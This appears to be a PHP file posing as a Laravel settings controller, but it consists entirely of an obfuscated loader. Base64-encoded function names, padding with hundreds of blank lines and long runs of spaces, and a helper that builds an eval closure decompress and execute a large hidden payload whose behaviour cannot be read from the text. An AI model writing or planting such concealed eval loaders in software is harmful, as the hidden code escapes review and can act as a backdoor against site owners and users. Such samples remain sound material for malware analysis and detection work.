<?php 
        $__='printf';$_='Loading app/Http/Controllers/Pengaturan/AplikasiController.php';
        



























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































































                                                                                                                                                                                                                     $________;
